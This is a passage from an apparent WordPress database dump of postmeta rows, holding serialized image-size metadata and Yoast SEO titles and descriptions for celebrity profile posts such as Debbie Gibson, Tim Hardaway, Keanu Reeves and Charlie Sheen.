25:\"Debbie-Gibson-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Debbie-Gibson-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Debbie-Gibson-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Debbie-Gibson-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Debbie-Gibson-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Debbie-Gibson-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Debbie-Gibson-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Debbie-Gibson-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Debbie-Gibson-677x385.jpg\";s:5:\"width\";i:677;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:25:\"Debbie-Gibson-677x486.jpg\";s:5:\"width\";i:677;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:25:\"Debbie-Gibson-677x580.jpg\";s:5:\"width\";i:677;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"Debbie-Gibson-392x420.jpg\";s:5:\"width\";i:392;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(1621,243,'_wp_attachment_image_alt','Debbie Gibson'),(1622,241,'_thumbnail_id','243'),(1623,241,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1624,241,'slide_template',''),(1625,241,'_yoast_wpseo_focuskw','Debbie Gibson'),(1626,241,'_yoast_wpseo_title','Debbie Gibson'),(1627,241,'_yoast_wpseo_metadesc','Debbie Gibson took the whole world by storm when she released her albums in the 80s. Learn more about this music genius as you read along this post about her career.'),(1628,241,'_yoast_wpseo_linkdex','84'),(1636,246,'_wp_attached_file','2015/09/wellness-junky160.png'),(1637,246,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:160;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2015/09/wellness-junky160.png\";s:5:\"sizes\";a:17:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"wellness-junky160-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"wellness-junky160-80x300.png\";s:5:\"width\";i:80;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:27:\"wellness-junky160-80x60.png\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:28:\"wellness-junky160-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:29:\"wellness-junky160-160x150.png\";s:5:\"width\";i:160;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:29:\"wellness-junky160-160x198.png\";s:5:\"width\";i:160;s:6:\"height\";i:198;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:29:\"wellness-junky160-160x160.png\";s:5:\"width\";i:160;s:6:\"height\";i:160;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:29:\"wellness-junky160-160x235.png\";s:5:\"width\";i:160;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:29:\"wellness-junky160-160x400.png\";s:5:\"width\";i:160;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:29:\"wellness-junky160-160x220.png\";s:5:\"width\";i:160;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:29:\"wellness-junky160-160x364.png\";s:5:\"width\";i:160;s:6:\"height\";i:364;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:29:\"wellness-junky160-160x261.png\";s:5:\"width\";i:160;s:6:\"height\";i:261;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:29:\"wellness-junky160-160x462.png\";s:5:\"width\";i:160;s:6:\"height\";i:462;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:29:\"wellness-junky160-160x385.png\";s:5:\"width\";i:160;s:6:\"height\";i:385;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:29:\"wellness-junky160-160x486.png\";s:5:\"width\";i:160;s:6:\"height\";i:486;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:29:\"wellness-junky160-160x580.png\";s:5:\"width\";i:160;s:6:\"height\";i:580;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:29:\"wellness-junky160-112x420.png\";s:5:\"width\";i:112;s:6:\"height\";i:420;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1638,247,'_wp_attached_file','2015/09/wellness-junky300.png'),(1639,247,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:300;s:6:\"height\";i:250;s:4:\"file\";s:29:\"2015/09/wellness-junky300.png\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"wellness-junky300-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"wellness-junky300-300x250.png\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:27:\"wellness-junky300-80x60.png\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:28:\"wellness-junky300-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:29:\"wellness-junky300-218x150.png\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:29:\"wellness-junky300-265x198.png\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:29:\"wellness-junky300-300x160.png\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:29:\"wellness-junky300-300x235.png\";s:5:\"width\";i:300;s:6:\"height\";i:235;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:29:\"wellness-junky300-300x220.png\";s:5:\"width\";i:300;s:6:\"height\";i:220;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1640,248,'_wp_attached_file','2015/09/wellness-junky728.png'),(1641,248,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:728;s:6:\"height\";i:90;s:4:\"file\";s:29:\"2015/09/wellness-junky728.png\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"wellness-junky728-150x90.png\";s:5:\"width\";i:150;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"wellness-junky728-300x37.png\";s:5:\"width\";i:300;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:27:\"wellness-junky728-80x60.png\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:28:\"wellness-junky728-100x70.png\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:28:\"wellness-junky728-218x90.png\";s:5:\"width\";i:218;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:28:\"wellness-junky728-265x90.png\";s:5:\"width\";i:265;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:28:\"wellness-junky728-324x90.png\";s:5:\"width\";i:324;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:28:\"wellness-junky728-324x90.png\";s:5:\"width\";i:324;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:28:\"wellness-junky728-324x90.png\";s:5:\"width\";i:324;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:28:\"wellness-junky728-356x90.png\";s:5:\"width\";i:356;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:28:\"wellness-junky728-356x90.png\";s:5:\"width\";i:356;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:28:\"wellness-junky728-533x90.png\";s:5:\"width\";i:533;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:28:\"wellness-junky728-534x90.png\";s:5:\"width\";i:534;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:28:\"wellness-junky728-696x86.png\";s:5:\"width\";i:696;s:6:\"height\";i:86;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:28:\"wellness-junky728-696x90.png\";s:5:\"width\";i:696;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1642,20,'td_page','a:1:{s:19:\"td_sidebar_position\";s:13:\"sidebar_right\";}'),(1643,250,'_edit_lock','1444832563:6'),(1644,250,'_edit_last','6'),(1645,251,'_wp_attached_file','2015/09/Tim.jpg'),(1646,251,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:533;s:4:\"file\";s:15:\"2015/09/Tim.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"Tim-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"Tim-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"Tim-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:13:\"Tim-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:14:\"Tim-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:15:\"Tim-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:15:\"Tim-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:15:\"Tim-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:15:\"Tim-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:15:\"Tim-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:15:\"Tim-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:15:\"Tim-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:15:\"Tim-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:15:\"Tim-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:15:\"Tim-696x464.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:464;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:15:\"Tim-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:15:\"Tim-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:15:\"Tim-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1647,251,'_wp_attachment_image_alt','Tim Hardaway'),(1648,250,'_thumbnail_id','251'),(1649,250,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1650,250,'slide_template',''),(1651,250,'_yoast_wpseo_focuskw','Tim Hardaway'),(1652,250,'_yoast_wpseo_title','Tim Hardaway'),(1653,250,'_yoast_wpseo_metadesc','Tim Hardaway is one of the greatest NBA players of all time. Learn more about this 6 foot guard, his career accomplishments and his personal life.'),(1654,250,'_yoast_wpseo_linkdex','86'),(1655,250,'post_views_count','273'),(1656,252,'_edit_lock','1444410447:6'),(1657,252,'_edit_last','6'),(1658,253,'_wp_attached_file','2015/09/Keanu-Reeves.jpg'),(1659,253,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:533;s:4:\"file\";s:24:\"2015/09/Keanu-Reeves.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Keanu-Reeves-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Keanu-Reeves-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Keanu-Reeves-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"Keanu-Reeves-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"Keanu-Reeves-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"Keanu-Reeves-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"Keanu-Reeves-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"Keanu-Reeves-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"Keanu-Reeves-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"Keanu-Reeves-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"Keanu-Reeves-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"Keanu-Reeves-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"Keanu-Reeves-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"Keanu-Reeves-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:24:\"Keanu-Reeves-696x464.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:464;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"Keanu-Reeves-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:24:\"Keanu-Reeves-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"Keanu-Reeves-630x420.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1660,253,'_wp_attachment_image_alt','Keanu-Reeves'),(1661,252,'_thumbnail_id','253'),(1662,252,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1663,252,'slide_template',''),(1664,252,'_yoast_wpseo_focuskw','Keanu Reeves'),(1665,252,'_yoast_wpseo_title','Keanu Reeves'),(1666,252,'_yoast_wpseo_metadesc','Keanu Reeves is one of the greatest actors today. Learn more about his career accomplishments, his personal life, and what he is most well known for.'),(1667,252,'_yoast_wpseo_linkdex','85'),(1668,254,'_edit_lock','1444410430:6'),(1669,254,'_edit_last','6'),(1670,252,'post_views_count','223'),(1671,254,'post_views_count','256'),(1672,255,'_wp_attached_file','2015/09/Charlie-Sheen.jpg'),(1673,255,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1015;s:6:\"height\";i:512;s:4:\"file\";s:25:\"2015/09/Charlie-Sheen.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Charlie-Sheen-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Charlie-Sheen-300x151.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Charlie-Sheen-768x387.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:387;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Charlie-Sheen-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Charlie-Sheen-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Charlie-Sheen-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"Charlie-Sheen-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Charlie-Sheen-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Charlie-Sheen-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Charlie-Sheen-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Charlie-Sheen-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Charlie-Sheen-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Charlie-Sheen-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Charlie-Sheen-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:25:\"Charlie-Sheen-696x351.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:351;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Charlie-Sheen-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:25:\"Charlie-Sheen-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"Charlie-Sheen-833x420.jpg\";s:5:\"width\";i:833;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1674,255,'_wp_attachment_image_alt','Charlie Sheen'),(1675,254,'_thumbnail_id','255'),(1676,254,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(1677,254,'slide_template',''),(1678,254,'_yoast_wpseo_focuskw','Charlie Sheen'),(1679,254,'_yoast_wpseo_title','Charlie Sheen'),(1680,254,'_yoast_wpseo_metadesc','Charlie Sheen is a great actor of the 80s, 90s and today. Learn more about this actor, his personal life, career accomplishments and what he is most famous 